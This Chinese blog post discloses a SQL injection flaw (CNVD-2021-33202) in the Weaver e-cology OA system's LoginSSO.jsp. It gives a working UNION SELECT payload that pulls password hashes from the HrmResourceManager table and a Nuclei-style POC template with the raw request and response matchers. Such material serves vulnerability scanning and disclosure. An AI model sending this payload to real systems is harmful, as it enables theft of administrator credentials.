漏洞信息

泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可在GET请求/upgrade/detail.jsp/login/LoginSSO.jsp路径,在参数id中写入常用payload:1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager,经过URL解码后得到1 UNION SELECT password as id from HrmResourceManager,意图获取password,。如果攻击成功,响应状态码为200,响应体包含标签包含的密码信息。

截图

S泛微E-Cology LoginSSO.jsp SQL注入漏洞(CNVD-2021-33202)结果回显证明
S泛微E-Cology LoginSSO.jsp SQL注入漏洞(CNVD-2021-33202)结果回显证明

POC

···
id: ecology-loginSSO-sql-CNVD-2021-33202
info:
name: Template Name
author: mhb17
severity: critical
description: description
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html
tags: ecology,sqli
requests:

  • raw:
    • |
      GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
      matchers-condition: and
      matchers:
    • type: word
      part: header
      words:
      • '200'
    • type: regex
      part: body
      regex:
      • '[0-9A-F]{32}'

···

参考链接


本站由 MY 使用 Stellar 1.33.1 主题创建。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。